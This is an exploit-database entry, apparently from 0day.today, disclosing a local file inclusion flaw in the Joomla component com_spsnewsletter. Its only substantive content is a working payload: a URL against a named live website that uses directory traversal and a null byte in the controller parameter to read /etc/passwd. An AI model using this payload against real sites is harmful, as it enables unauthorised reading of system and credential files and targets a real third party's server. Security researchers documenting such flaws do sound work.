id: 11722
date: 04/11/2010
title: Joomla Component com_spsnewsletter Local File Inclusion Vulnerability
author: AntiSecurity
cves: 

=====================================================================
Joomla Component com_spsnewsletter Local File Inclusion Vulnerability
=====================================================================

# Exploit Title:
Joomla Component spsNewsletter Local File Inclusion Vulnerability
 
# Date:
April, 11 2010
 
# Author:
AntiSecurity
 
# Software Link:
http://www.modernbridge.com/spsNewsletter/
 
# Version:
com_spsnewsletter version unknown
 
# Tested on:
Linux
 
# Target example
http://ailpsicilia.it/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00



#  0day.today [2023-03-22]  #